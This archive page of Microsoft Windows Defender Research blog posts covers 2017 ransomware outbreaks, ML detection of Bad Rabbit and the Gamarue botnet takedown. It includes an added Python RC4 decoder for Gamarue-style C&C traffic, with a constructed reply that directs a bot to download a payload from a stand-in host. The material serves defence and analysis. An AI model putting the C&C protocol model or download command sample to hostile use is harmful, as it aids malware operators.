Archive for the ‘cybersecurity’ Category

A worthy upgrade: Next-gen security on Windows 10 proves resilient against ransomware outbreaks in 2017

January 10th, 2018

Adopting reliable attack methods and techniques borrowed from more evolved threat types, ransomware attained new levels of reach and damage in 2017. The following trends characterize the ransomware narrative in the past year:

  • Three global outbreaks showed the force of ransomware in making real-world impact, affecting corporate networks and bringing down critical services like hospitals, transportation, and traffic systems
  • Three million unique computers encountered ransomware; millions more saw downloader trojans, exploits, emails, websites and other components of the ransomware kill chain
  • New attack vectors, including compromised supply chain, exploits, phishing emails, and documents taking advantage of the DDE feature in Office were used to deliver ransomware
  • More than 120 new ransomware families, plus countless variants of established families and less prevalent ransomware caught by heuristic and generic detections, emerged from a thriving cybercriminal enterprise powered by ransomware-as-a-service

The trend towards increasingly sophisticated malware behavior, highlighted by the use of exploits and other attack vectors, makes older platforms so much more susceptible to ransomware attacks. From June to November, Windows 7 devices were 3.4 times more likely to encounter ransomware compared to Windows 10 devices. Considering that Windows 10 has a much larger install base than Windows 7, this difference in ransomware encounter rate is significant.

Figure 1. Ransomware encounter rates on Windows 7 and Windows 10 devices. Encounter rate refers to the percentage of computers running the OS version with Microsoft real-time security that blocked or detected ransomware.

The data shows that attackers are targeting Windows 7. Given today's modern threats, older platforms can be infiltrated more easily because these platforms don't have the advanced built-in end-to-end defense stack available on Windows 10. Continuous enhancements further make Windows 10 more resilient to ransomware and other types of attack.

Windows 10: Multi-layer defense against ransomware attacks

The year 2017 saw three global ransomware outbreaks driven by multiple propagation and infection techniques that are not necessarily new but not typically observed in ransomware. While there are technologies available on Windows 7 to mitigate attacks, Windows 10's comprehensive set of platform mitigations and next-generation technologies cover these attack methods. Additionally, Windows 10 S, which is a configuration of Windows 10 that's streamlined for security and performance, locks down devices against ransomware outbreaks and other threats.

In May, WannaCry (Ransom:Win32/WannaCrypt) caused the first global ransomware outbreak. It used EternalBlue, an exploit for a previously fixed SMBv1 vulnerability, to infect computers and spread across networks at speeds never before observed in ransomware.

On Windows 7, Windows AppLocker and antimalware solutions like Microsoft Security Essentials and System Center Endpoint Protection (SCEP) can block the infection process. However, because WannaCry used an exploit to spread and infect devices, networks with vulnerable Windows 7 devices fell victim. The WannaCry outbreak highlighted the importance of keeping platforms and software up-to-date, especially with critical security patches.

Windows 10 was not at risk from the WannaCry attack. Windows 10 has security technologies that can block the WannaCry ransomware and its spreading mechanism. Built-in exploit mitigations on Windows 10 (KASLR, NX HAL, and PAGE POOL), as well as kCFG (control-flow guard for kernel) and HVCI (kernel code-integrity), make Windows 10 much more difficult to exploit.

Figure 2. Windows 7 and Windows 10 platform defenses against WannaCry

In June, Petya (Ransom:Win32/Petya.B) used the same exploit that gave WannaCry its spreading capabilities, and added more propagation and infection methods to give birth to arguably the most complex ransomware in 2017. Petya's initial infection vector was a compromised software supply chain, but the ransomware quickly spread using the EternalBlue and EternalRomance exploits, as well as a module for lateral movement using stolen credentials.

On Windows 7, Windows AppLocker can stop Petya from infecting the device. If a Windows 7 device was fully patched, Petya's exploitation behavior did not work. However, Petya also stole credentials, which it then used to spread across networks. Once running on a Windows 7 device, only an up-to-date antivirus that had protection in place at zero hour could stop Petya from encrypting files or tampering with the master boot record (MBR).

On the other hand, on Windows 10, Petya had more layers of defenses to overcome. Apart from Windows AppLocker, Windows Defender Application Control can block Petya's entry vector (i.e., a compromised software updater running an untrusted binary), as well as the propagation techniques that used untrusted DLLs. Windows 10's built-in exploit mitigations can further protect Windows 10 devices from the Petya exploit. Credential Guard can prevent Petya from stealing credentials from the Local Security Authority Subsystem Service (LSASS), helping curb the ransomware's propagation technique. Meanwhile, Windows Defender System Guard (Secure Boot) can stop the MBR modified by Petya from being loaded at boot time, preventing the ransomware from causing damage to the master file table (MFT).

Figure 3. Windows 7 and Windows 10 platform defenses against Petya

In October, another sophisticated ransomware reared its ugly head: Bad Rabbit ransomware (Ransom:Win32/Tibbar.A) infected devices by posing as an Adobe Flash installer available for download on compromised websites. Similar to WannaCry and Petya, Bad Rabbit had spreading capabilities, albeit more traditional: it used a hardcoded list of user names and passwords. Like Petya, it can also render infected devices unbootable, because, in addition to encrypting files, it also encrypted entire disks.

On Windows 7 devices, several security technologies can block the download and installation of the ransomware, but protecting the device from the damaging payload and preventing it from infecting other computers in the network can be tricky.

With Windows 10, however, in addition to stronger defense at the infection vector, corporate networks were safer from this damaging threat because several technologies are available to stop or detect Bad Rabbit's attempts to spread across networks using exploits or hardcoded user names and passwords.

More importantly, during the Bad Rabbit outbreak, detonation-based machine learning models in Windows Defender AV cloud protection service, with no human intervention, correctly classified the malware 14 minutes after the very first encounter. The said detonation-based ML models are a part of several layers of machine learning and artificial intelligence technologies that evaluate files in order to reach a verdict on suspected malware. Using this layered approach, Windows Defender AV protected Windows 10 devices with cloud protection enabled from Bad Rabbit within minutes of the outbreak.

Figure 4. Windows 7 and Windows 10 platform defenses against Bad Rabbit

As these outbreaks demonstrated, ransomware has indeed become a highly complex threat that can be expected to continue evolving in 2018 and beyond. The multiple layers of next-generation security technologies on Windows 10 are designed to disrupt the attack methods that we have previously seen in highly specialized malware but now also see in ransomware.

Ransomware protection on Windows 10

For end users, the dreaded ransom note announces that ransomware has already taken their files hostage: documents, precious photos and videos, and other important files encrypted. On Windows 10 Fall Creators Update, a new feature helps stop ransomware from accessing important files in real-time, even if it manages to infect the computer. When enabled, Controlled folder access locks down folders, allowing only authorized apps to access files.

Controlled folder access, however, is but one layer of defense. Ransomware and other threats from the web can be blocked by Microsoft Edge, whose exploit mitigation and sandbox features make it a very secure browser. Microsoft Edge significantly improves web security by using Windows Defender SmartScreen's reputation-based blocking of malicious downloads and by opening pages within low-privilege app containers.

Windows Defender Antivirus also continues to enhance defense against threats like ransomware. Its advanced generic and heuristic techniques and layered machine learning models help catch both common and rare ransomware families. Windows Defender AV can detect and block most malware, including never-before-seen ransomware, using generics and heuristics, local ML models, and metadata-based ML models in the cloud. In the rare cases where a threat slips past these layers of protection, Windows Defender AV can protect patient zero in real-time using analysis-based ML models, as demonstrated in a real-life case where a customer was protected from a very new Spora ransomware in a matter of seconds. In the even rarer cases of inconclusive initial classification, additional automated analysis and ML models can still protect customers within minutes, as happened during the Bad Rabbit outbreak.

Windows 10 S locks down devices from unauthorized content by working exclusively with apps from the Windows Store and by using Microsoft Edge as the default browser. This streamlined, Microsoft-verified platform seals common entry points for ransomware and other threats.

Reducing the attack surface for ransomware and other threats in corporate networks

For enterprises and small businesses, the impact of ransomware is graver. Losing access to files can mean disrupted operations. Big enterprise networks, including critical infrastructures, fell victim to ransomware outbreaks. The modern enterprise network is under constant assault by attackers and needs to be defended on all fronts.

Windows Defender Exploit Guard locks down devices against a wide variety of attack vectors. Its host intrusion prevention capabilities include the following components, which block behaviors commonly used in malware attacks:

  • Attack Surface Reduction (ASR) is a set of controls that blocks common ransomware entry points: Office-, script-, and email-based threats that download and install ransomware; ASR can also protect from emerging exploits like DDEDownloader, which has been used to distribute ransomware
  • Network protection uses Windows Defender SmartScreen to block outbound connections to untrusted hosts, such as when trojan downloaders connect to a malicious server to obtain ransomware payloads
  • Controlled folder access blocks ransomware and other untrusted processes from accessing protected folders and encrypting files in those folders
  • Exploit protection (replacing EMET) provides mitigation against a broad set of exploit techniques that are now being used by ransomware authors

Additionally, the industry-best browser security in Microsoft Edge is enhanced by Windows Defender Application Guard, which brings Azure cloud-grade isolation and security segmentation to Windows applications. This hardware-level isolation capability provides one of the highest levels of protection against zero-day exploits, unpatched vulnerabilities, and web-based malware.

For emails, Microsoft Exchange Online Protection (EOP) uses built-in anti-spam filtering capabilities that help protect Office 365 customers against ransomware attacks that begin with email. Office 365 Advanced Threat Protection helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection.

Integrated security for enterprises

Windows Defender Advanced Threat Protection allows SecOps personnel to stop the spread of ransomware through timely detection of ransomware activity in the network. Windows Defender ATP's enhanced behavioral and machine learning detection libraries flag malicious behavior across the ransomware attack kill-chain, enabling SecOps to promptly investigate and respond to ransomware attacks.

With Windows 10 Fall Creators Update, Windows Defender ATP was expanded to include seamless integration across the entire Windows protection stack, including Windows Defender Exploit Guard, Windows Defender Application Guard, and Windows Defender AV. This integration is designed to provide a single pane of glass for a seamless security management experience.

With all of these security technologies, Microsoft has built the most secure Windows version ever with Windows 10. While the threat landscape will continue to evolve in 2018 and beyond, we don't stop innovating and investing in security solutions that continue to harden Windows 10 against attacks. The twice-per-year feature update release cycle reflects our commitment to innovate and to make it easier to disrupt successful attack techniques with new protection features. Upgrading to Windows 10 not only means decreased risk; it also means access to advanced, multi-layered defense against ransomware and other types of modern attacks.

Tanmay Ganacharya (@tanmayg)
Principal Group Manager, Windows Defender Research


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Detonating a bad rabbit: Windows Defender Antivirus and layered machine learning defenses

December 11th, 2017

Windows Defender Antivirus uses a layered approach to protection: tiers of advanced automation and machine learning models evaluate files in order to reach a verdict on suspected malware. While Windows Defender AV detects a vast majority of new malware files at first sight, we always strive to further close the gap between malware release and detection.

In a previous blog post, we looked at a real-world case study showing how the Windows Defender Antivirus cloud protection service leverages next-gen security technologies to save "patient zero" from new malware threats in real-time. In that case study, a new Spora ransomware variant was analyzed and blocked within seconds using a deep neural network (DNN) machine learning classifier in the cloud. In this blog post we'll look at how additional automated analysis and machine learning models can further protect customers within minutes in the rare cases where initial classification is inconclusive.

Layered machine learning models

In Windows Defender AV's layered approach to defense, if the first layer doesn't detect a threat, we move on to the next level of inspection. As we move down the layers, the amount of time required increases. However, we catch the vast majority of malware at the first (fastest) protection layers and only need to move on to a more sophisticated (but slower) level of inspection for rarer or more advanced threats.

For example, the vast majority of scanned objects are evaluated by the local Windows Defender client machine learning models, behavior-based detection algorithms, generic and heuristic classifications, and more. This helps ensure that users get the best possible performance. In the rare cases where local intelligence can't reach a definitive verdict, Windows Defender AV will use the cloud for deeper analysis.

Figure 1. Layered detection model

For a more detailed look at our approach to protection, see The evolution of malware prevention.

Detonation-based machine learning classification

We use a variety of machine learning models that use different algorithms to predict whether a certain file is malware. Some of these algorithms are binary classifiers that give a strict clean-or-malware verdict (0 or 1), while others are multi-class classifiers that provide a probability for each classification (malware, clean, potentially unwanted application, etc). Each machine learning model is trained against a set of different features (often thousands, sometimes hundreds of thousands) to learn to distinguish between different kinds of programs.

For the fastest classifiers in our layered stack, the features may include static attributes of the file combined with events (for example, API calls or behaviors) seen while the scanning engine emulates the file using dynamic translation. If the results from these models are inconclusive, we'll take an even more in-depth look at what the malware does by actually executing it in a sandbox and observing its run-time behavior. This is known as dynamic analysis, or detonation, and happens automatically whenever we receive a new suspected malware sample.

The activities seen in the sandbox machine (for example, registry changes, file creation/deletion, process injection, network connections, and so forth) are recorded and provided as features to our ML models. These models can then combine both the static features obtained from scanning the file with the dynamic features observed during detonation to arrive at an even stronger prediction.

Figure 2. Detonation-based machine learning classification

Ransom:Win32/Tibbar.A Protection in 14 minutes

On October 24, 2017, in the wake of recent ransomware outbreaks such as WannaCry and NotPetya, news broke of a new threat spreading, primarily in Ukraine and Russia: Ransom:Win32/Tibbar.A (popularly known as Bad Rabbit).

This threat is a good example of how detonation-based machine learning came into play to protect Windows Defender AV customers. First though, let's look at what happened to patient zero.

At 11:17 a.m. local time on October 24, a user running Windows Defender AV in St. Petersburg, Russia was tricked into downloading a file named FlashUtil.exe from a malicious website. Instead of a Flash update, the program was really the just-released Tibbar ransomware.

Windows Defender AV scanned the file and determined that it was suspicious. A query was sent to the cloud protection service, where several metadata-based machine learning models found the file suspicious, but not with a high enough probability to block. The cloud protection service requested that the Windows Defender AV client lock the file, upload it for processing, and wait for a decision.

Within a few seconds the file was processed, and sample-analysis-based ML models returned their conclusions. In this case, a multi-class deep neural network (DNN) machine learning classifier correctly classified the Tibbar sample as malware, but with only an 81.6% probability score. In order to avoid false positives, the cloud protection service is configured by default to require at least 90% probability to block the malware (these thresholds are continually evaluated and fine-tuned to find the right balance between blocking malware and avoiding the blocking of legitimate programs). In this case, the ransomware was allowed to run.

Figure 3. Ransom:Win32/Tibbar.A ransom note

Detonation chamber

In the meantime, while patient zero and eight other unfortunate victims (in Ukraine, Russia, Israel, and Bulgaria) contemplated whether to pay the ransom, the sample was detonated and details of the system changes made by the ransomware were recorded.

Figure 4. Sample detonation events used by the machine learning model

As soon as the detonation results were available, a multi-class deep neural network (DNN) classifier that used both static and dynamic features evaluated the results and classified the sample as malware with 90.7% confidence, high enough for the cloud to start blocking.

When a tenth Windows Defender AV customer, in Ukraine, was tricked into downloading the ransomware at 11:31 a.m. local time, 14 minutes after the first encounter, the cloud protection service used the detonation-based malware classification to immediately block the file and protect the customer.

At this point the cloud protection service had “learned” that this file was malware. It now only required metadata from the client with the hash of the file to issue blocking decisions and protect customers. As the attack gained momentum and began to spread, Windows Defender AV customers with cloud protection enabled were protected. Later, a more specific detection was released to identify the malware as Ransom:Win32/Tibbar.A.

Closing the gap

While we feel good about Windows Defender AV's layered approach to protection, digging deeper and deeper with automation and machine learning in order to finally reach a verdict on suspected malware, we are continually seeking to close the gap even further between malware release and protection. The cases where we cannot block at first sight are increasingly rare, but there is still much to be done. As our machine learning models are continuously updated and retrained, we are able to make better predictions over time. Yet malware authors will not rest, and the ever-changing threat landscape requires continuous investment in new and better technologies, not only to detect new threats but also to effectively differentiate the good from the bad.

What about systems that do get infected while detonation and classification are underway? One area that we’re actively investing in is advanced remediation techniques that will let us reach back out to those systems in an organization that were vulnerable and, if possible, get them back to a healthy state.

If you are an organization that is willing to accept a higher false positive risk in exchange for stronger protection, you can configure the cloud protection level to tell the Windows Defender AV cloud protection service to take a more aggressive stance towards suspicious files, such as blocking at lower machine learning probability thresholds. In the Tibbar example above, a configuration like this could have protected patient zero using the initial 81% confidence score, rather than waiting for the higher-confidence (detonation-based) result that came later. You can also configure the cloud extended timeout to give the cloud protection service more time to evaluate a first-seen threat.
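The following Python model replays the Bad Rabbit timeline described above (metadata models inconclusive, sample DNN at 81.6% below the 90% default threshold, detonation DNN at 90.7%, and later encounters blocked by hash) under the default settings, a lower block threshold, and an extended timeout. It is an added illustration, not Windows Defender code: the stage latencies, the 70% metadata score, the 10-second default timeout and the 80% "aggressive" threshold are assumed, and the scorers are stand-ins for real classifiers.

```python
"""Layered cloud-protection verdict pipeline modelled on the Bad Rabbit
(Ransom:Win32/Tibbar.A) timeline. Constructed example: the scorers return the
probabilities reported in the post instead of running real ML models."""
import hashlib
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Set, Tuple

DEFAULT_BLOCK_THRESHOLD = 0.90   # post: the cloud blocks at >= 90% probability by default
DEFAULT_TIMEOUT_SECONDS = 10.0   # assumed: how long the client holds the file awaiting the cloud


@dataclass
class Stage:
    """One analysis layer: name, assumed latency, and a scorer returning
    P(malware), or None when that layer cannot reach a verdict."""
    name: str
    seconds: float
    score: Callable[[bytes], Optional[float]]


@dataclass
class Verdict:
    action: str        # "block" or "allow"
    reason: str        # deciding stage, "hash-lookup", "timeout" or "inconclusive"
    at_seconds: float  # when the client received the verdict


@dataclass
class CloudProtection:
    stages: List[Stage]
    block_threshold: float = DEFAULT_BLOCK_THRESHOLD
    timeout_seconds: float = DEFAULT_TIMEOUT_SECONDS
    known_malware: Set[str] = field(default_factory=set)  # hashes learned once a layer blocks

    def evaluate(self, sample: bytes) -> Verdict:
        """Run the layers in order. The client gets the first block verdict, or
        'allow' once the timeout expires; analysis still continues so that later
        encounters of the same file are blocked from the hash alone."""
        digest = hashlib.sha256(sample).hexdigest()
        if digest in self.known_malware:
            return Verdict("block", "hash-lookup", 0.0)
        elapsed = 0.0
        client: Optional[Verdict] = None
        for stage in self.stages:
            elapsed += stage.seconds
            if client is None and elapsed > self.timeout_seconds:
                client = Verdict("allow", "timeout", self.timeout_seconds)
            p = stage.score(sample)
            if p is None:
                continue                       # inconclusive: fall through to the next layer
            if p >= self.block_threshold:
                self.known_malware.add(digest)  # the cloud has now "learned" this file
                if client is None:
                    client = Verdict("block", stage.name, elapsed)
                break
        return client or Verdict("allow", "inconclusive", elapsed)


# Constructed stand-in for the FlashUtil.exe download; only its hash matters here.
TIBBAR_SAMPLE = b"constructed-stand-in-for-FlashUtil.exe"

# Stand-in scores per layer: local client inconclusive, metadata models "suspicious
# but not enough" (70% assumed), sample DNN 81.6%, detonation DNN 90.7% (from the post).
STAND_IN_SCORES: Dict[str, Optional[float]] = {
    "local-client": None,
    "cloud-metadata": 0.70,
    "sample-dnn": 0.816,
    "detonation-dnn": 0.907,
}


def scorer(stage_name: str) -> Callable[[bytes], Optional[float]]:
    """Return the stand-in score for the Tibbar sample, 0.0 for anything else."""
    return lambda sample: STAND_IN_SCORES[stage_name] if sample == TIBBAR_SAMPLE else 0.0


def build_pipeline(block_threshold: float = DEFAULT_BLOCK_THRESHOLD,
                   timeout_seconds: float = DEFAULT_TIMEOUT_SECONDS) -> CloudProtection:
    stages = [
        Stage("local-client", 0.1, scorer("local-client")),      # latencies are assumed
        Stage("cloud-metadata", 0.5, scorer("cloud-metadata")),
        Stage("sample-dnn", 3.0, scorer("sample-dnn")),
        Stage("detonation-dnn", 14 * 60, scorer("detonation-dnn")),  # ~14 min in the post
    ]
    return CloudProtection(stages, block_threshold, timeout_seconds)


def replay(block_threshold: float = DEFAULT_BLOCK_THRESHOLD,
           timeout_seconds: float = DEFAULT_TIMEOUT_SECONDS) -> Tuple[Verdict, Verdict]:
    """Replay patient zero, then a later customer downloading the same file."""
    cloud = build_pipeline(block_threshold, timeout_seconds)
    return cloud.evaluate(TIBBAR_SAMPLE), cloud.evaluate(TIBBAR_SAMPLE)


if __name__ == "__main__":
    for label, kwargs in [("default", {}),
                          ("aggressive threshold", {"block_threshold": 0.80}),
                          ("extended timeout", {"timeout_seconds": 15 * 60})]:
        first, second = replay(**kwargs)
        print(f"{label:20s} patient zero: {first.action} ({first.reason} at "
              f"{first.at_seconds:.1f}s); next encounter: {second.action} ({second.reason})")
```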

As another layer of real-time protection against ransomware, enable Controlled folder access, which is one of the features of the new Windows Defender Exploit Guard. Controlled folder access protects files from tampering by locking folders so that ransomware and other unauthorized apps can't access them.

For enterprises, Windows Defender Exploit Guard's other features (Attack Surface Reduction, Exploit protection, and Network protection) further protect networks from advanced attacks. Windows Defender Advanced Threat Protection can also alert security operations personnel about malware activities in the network so that personnel can promptly investigate and respond to attacks.

For users running Windows 10 S, malware like Tibbar simply won't run. Windows 10 S provides advanced levels of security by exclusively running apps from the Microsoft Store. Threats such as Tibbar are non-issues for Windows 10 S users. Learn more about Windows 10 S.

New machine learning and AI techniques, in combination with both static and dynamic analysis, give Windows Defender AV the ability to block more and more malware threats at first sight and, if that fails, to learn as quickly as possible that something is bad and start blocking it. Using a layered approach, with different ML models at each layer, gives us the ability to target a wide variety of threats quickly while maintaining low false positive rates. As we gather more data about a potential threat, we can provide predictions with higher and higher confidence and take action accordingly. It is an exciting time to be in the fray.

Randy Treit

Senior Security Researcher, Windows Defender Research


Microsoft teams up with law enforcement and other partners to disrupt Gamarue (Andromeda)

December 4th, 2017

Today, with help from Microsoft security researchers, law enforcement agencies around the globe, in cooperation with Microsoft Digital Crimes Unit (DCU), announced the disruption of Gamarue, a widely distributed malware that has been used in networks of infected computers collectively called the Andromeda botnet.

The disruption is the culmination of a journey that started in December 2015, when the Microsoft Windows Defender research team and DCU activated a Coordinated Malware Eradication (CME) campaign for Gamarue. In partnership with internet security firm ESET, we performed in-depth research into the Gamarue malware and its infrastructure.

Our analysis of more than 44,000 malware samples uncovered Gamarue's sprawling infrastructure. We provided detailed information about that infrastructure to law enforcement agencies around the world, including:

  • 1,214 domains and IP addresses of the botnet's command and control servers
  • 464 distinct botnets
  • More than 80 associated malware families

The coordinated global operation resulted in the takedown of the botnet's servers, disrupting one of the largest malware operations in the world. Since 2011, Gamarue has been distributing a plethora of other threats, including:

A global malware operation

For the past six years, Gamarue has been a very active malware operation that, until the takedown, showed no signs of slowing down. Windows Defender telemetry in the last six months shows Gamarue's global prevalence.

Figure 1. Gamarue's global prevalence from May to November 2017

While the threat is global, the list of top 10 countries with Gamarue encounters is dominated by Asian countries.

Figure 2. Top 10 countries with the most Gamarue encounters from May to November 2017

In the last six months, Gamarue was detected or blocked on approximately 1,095,457 machines every month on average.

Figure 3. Machines, IPs, and unique file encounters for Gamarue from May to November 2017; data does not include LNK detections

The Gamarue bot

Gamarue is known in the underground cybercrime market as Andromeda bot. A bot is a program that allows an attacker to take control of an infected machine. Like many other bots, Gamarue is advertised as a crime kit that hackers can purchase.

The Gamarue crime kit includes the following components:

  • Bot-builder, which builds the malware binary that infects computers
  • Command-and-control application, which is a PHP-based dashboard application that allows hackers to manage and control the bots
  • Documentation on how to create a Gamarue botnet

A botnet is a network of infected machines that communicate with command-and-control (C&C) servers, which are computer servers used by the hacker to control infected machines.

The evolution of the Gamarue bot has been the subject of many thorough analyses by security researchers. At the time of takedown, there were five known active Gamarue versions: 2.06, 2.07, 2.08, 2.09, and 2.10. The latest and the most active is version 2.10.

Gamarue is modular, which means that its functionality can be extended by plugins that are either included in the crime kit or available for separate purchase. The Gamarue plugins include:

  • Keylogger ($150) – Used for logging keystrokes and mouse activity in order to steal user names and passwords, financial information, etc.
  • Rootkit (included in crime kit) – Injects rootkit code into all processes running on a victim computer to give Gamarue persistence
  • Socks4/5 (included in crime kit) – Turns the victim computer into a proxy server for serving malware or malicious instructions to other computers on the internet
  • Formgrabber ($250) – Captures any data submitted through web browsers (Chrome, Firefox, and Internet Explorer)
  • Teamviewer ($250) – Enables the attacker to remotely control the victim machine, spy on the desktop, and perform file transfers, among other functions
  • Spreader – Adds the capability to spread the Gamarue malware itself via removable drives (for example, portable hard drives or flash drives connected via a USB port); it also uses a domain generation algorithm (DGA) for the servers from which it downloads updates

Gamarue attack kill-chain

Over the years, various attack vectors have been used to distribute Gamarue. These include:

  • Removable drives
  • Social media (such as Facebook) messages with malicious links to websites that host Gamarue
  • Drive-by downloads/exploit kits
  • Spam emails with malicious links
  • Trojan downloaders

Once Gamarue has infected a machine, it contacts the C&C server, making the machine part of the botnet. Through the C&C server, the hacker can control Gamarue-infected machines, steal information, or issue commands to download additional malware modules.

Figure 4. Gamarue's attack kill-chain

Gamarue's main goal is to distribute other prevalent malware families. During the CME campaign, we saw at least 80 different malware families distributed by Gamarue. Some of these malware families include:

The installation of other malware broadens the scale of what hackers can do with the network of infected machines.

Command-and-control communication

When the Gamarue malware triggers the infected machine to contact the C&C server, it provides information like the hard disk's volume serial number (used as the bot ID for the computer), the Gamarue build ID, the operating system of the infected machine, the local IP address, an indication of whether the signed-in user has administrative rights, and the keyboard language setting of the infected machine. This information is sent to the C&C server via HTTP using the JSON format:

Figure 5. Information sent by Gamarue to C&C server

The information about keyboard language setting is very interesting, because the machine will not be further infected if the keyboard language corresponds to the following countries:

  • Belarus
  • Russia
  • Ukraine
  • Kazakhstan

Before being sent to the C&C server, this information is encrypted with the RC4 algorithm using a key hardcoded in the Gamarue malware body.

Figure 6. Encrypted C&C communication

Once the C&C server receives the message, it sends a command that is pre-assigned by the hacker in the control dashboard.

Figure 7. Sample control dashboard used by attackers to communicate to Gamarue bots

The command can be any of the following:

  • Download EXE (i.e., additional executable malware files)
  • Download DLL (i.e., additional malware; removed in version 2.09 and later)
  • Install plugin
  • Update bot (i.e., update the bot malware)
  • Delete DLLs (removed in version 2.09 and later)
  • Delete plugins
  • Kill bot

The last three commands can be used to remove evidence of Gamarue's presence on infected machines.

The reply from the C&C server is also encrypted with the RC4 algorithm, using the same key used to encrypt the message from the infected machine.

Figure 8. Encrypted reply from C&C server

When decrypted, the reply contains the following information:

  • Time interval – in minutes, the time to wait before asking the C2 server for the next command
  • Task ID – used by the hacker to track whether there was an error performing the task
  • Command – one of the commands listed above
  • Download URL – from which a plugin, updated binary, or other malware can be downloaded, depending on the command
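The beacon and reply exchange described in this section, worked through as an analyst's decoder: RC4 over a JSON body in both directions, the beacon fields the post lists, the reply fields above, and a triage summary that flags the three evidence-removal commands and the keyboard-language exclusion. This is an added example for incident responders, not Gamarue's code or Microsoft's tooling; the RC4 key, the JSON field names, the locale tags, and the captured byte strings are constructed placeholders, since the post does not publish the real ones.

```python
"""Decoder and triage helper for Gamarue-style C&C traffic as described in
the post. Constructed example: the key, JSON field names and sample captures
are assumptions, not values taken from real Gamarue samples."""
import json
from typing import Dict, Optional

PLACEHOLDER_KEY = b"placeholder-rc4-key"   # the real key is hardcoded in the bot; not given here

# Commands the post lists; the last three remove evidence of the infection.
COMMANDS = ["download_exe", "download_dll", "install_plugin", "update_bot",
            "delete_dlls", "delete_plugins", "kill_bot"]
EVIDENCE_REMOVAL = {"delete_dlls", "delete_plugins", "kill_bot"}

# Keyboard languages for which the post says the bot stops infecting (locale tags assumed).
EXCLUDED_KEYBOARD_LOCALES = {"be-BY", "ru-RU", "uk-UA", "kk-KZ"}

BEACON_FIELDS = {"volume_serial", "build_id", "os", "local_ip", "is_admin", "keyboard"}
REPLY_FIELDS = {"interval_minutes", "task_id", "command"}   # download_url is optional


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). It is symmetric, so the same routine decrypts
    captured traffic and builds the constructed samples below."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation + XOR
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _decrypt_json(key: bytes, blob: bytes, required: set) -> dict:
    """Decrypt and parse; a wrong key yields garbage, which surfaces as ValueError."""
    try:
        msg = json.loads(rc4(key, blob).decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError("not a valid RC4/JSON message under this key") from exc
    missing = required - set(msg)
    if not isinstance(msg, dict) or missing:
        raise ValueError(f"message lacks fields: {sorted(missing)}")
    return msg


def decode_beacon(key: bytes, blob: bytes) -> dict:
    """Bot -> C&C check-in (volume serial as bot ID, build ID, OS, local IP, admin flag, keyboard)."""
    return _decrypt_json(key, blob, BEACON_FIELDS)


def decode_reply(key: bytes, blob: bytes) -> dict:
    """C&C -> bot reply (interval, task ID, command, optional download URL)."""
    reply = _decrypt_json(key, blob, REPLY_FIELDS)
    if reply["command"] not in COMMANDS:
        raise ValueError(f"unknown command {reply['command']!r}")
    return reply


def triage(key: bytes, beacon_blob: bytes, reply_blob: bytes) -> Dict[str, object]:
    """Decode one request/response pair into the facts a responder wants first."""
    beacon = decode_beacon(key, beacon_blob)
    reply = decode_reply(key, reply_blob)
    return {
        "bot_id": beacon["volume_serial"],
        "build_id": beacon["build_id"],
        "runs_as_admin": bool(beacon["is_admin"]),
        "bot_would_skip_host": beacon["keyboard"] in EXCLUDED_KEYBOARD_LOCALES,
        "command": reply["command"],
        "evidence_removal": reply["command"] in EVIDENCE_REMOVAL,
        "payload_url": reply.get("download_url"),
        "next_poll_minutes": reply["interval_minutes"],
    }


# Constructed captures under the assumed layout (not real Gamarue traffic).
SAMPLE_BEACON = rc4(PLACEHOLDER_KEY, json.dumps({
    "volume_serial": "A1B2-C3D4", "build_id": "constructed-build-01", "os": "Windows 7 SP1",
    "local_ip": "192.0.2.10", "is_admin": True, "keyboard": "en-US"}).encode())
SAMPLE_REPLY = rc4(PLACEHOLDER_KEY, json.dumps({
    "interval_minutes": 30, "task_id": 7, "command": "download_exe",
    "download_url": "http://c2.example.invalid/payload.exe"}).encode())
SAMPLE_KILL_REPLY = rc4(PLACEHOLDER_KEY, json.dumps({
    "interval_minutes": 1, "task_id": 8, "command": "kill_bot"}).encode())

if __name__ == "__main__":
    for name, reply in (("download", SAMPLE_REPLY), ("kill", SAMPLE_KILL_REPLY)):
        print(name, triage(PLACEHOLDER_KEY, SAMPLE_BEACON, reply))
```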

Figure 9. Decrypted reply from C&C server

Anti-sandbox techniques

Gamarue employs anti-AV techniques to make analysis and detection difficult. Prior to infecting a machine, Gamarue checks a list of hashes of the processes running on a potential victim's machine. If it finds a process that may be associated with malware analysis tools, such as virtual machines or sandbox tools, Gamarue does not infect the machine. In older versions, a fake payload is manifested when running in a virtual machine.

Figure 10. Gamarue checks if any of the running processes are associated with malware analysis tools

Stealth mechanisms

Gamarue uses cross-process injection techniques to stay under the radar. It injects its code into the following legitimate processes:

  • msiexec.exe (Gamarue versions 2.07 to 2.10)
  • wuauclt.exe, wupgrade.exe, svchost.exe (version 2.06)

It can also use a rootkit plugin to hide the Gamarue file and its autostart registry entry.

Gamarue employs a stealthy technique to store and load its plugins as well. The plugins are stored fileless, either saved in the registry or in an alternate data stream of the Gamarue file.

OS tampering

Gamarue attempts to tamper with the operating systems of infected computers by disabling Firewall, Windows Update, and User Account Control functions. These functionalities cannot be re-enabled until the Gamarue infection has been removed from the infected machine. This OS tampering behavior does not work on Windows 10.

Figure 11. Disabled Firewall and Windows Update

Monetization

There are several ways hackers earn money using Gamarue. Since Gamarue's main purpose is to distribute other malware, hackers earn through a pay-per-install scheme. Using its plugins, Gamarue can also steal user information; stolen information can be sold to other hackers in cybercriminal underground markets. Access to Gamarue-infected machines can also be sold, rented, leased, or swapped by one criminal group to another.

Remediation

To help prevent a Gamarue infection, as well as other malware and unwanted software, take these precautions:

  • Be cautious when opening emails or social media messages from unknown users.
  • Be wary about downloading software from websites other than the program developer's.

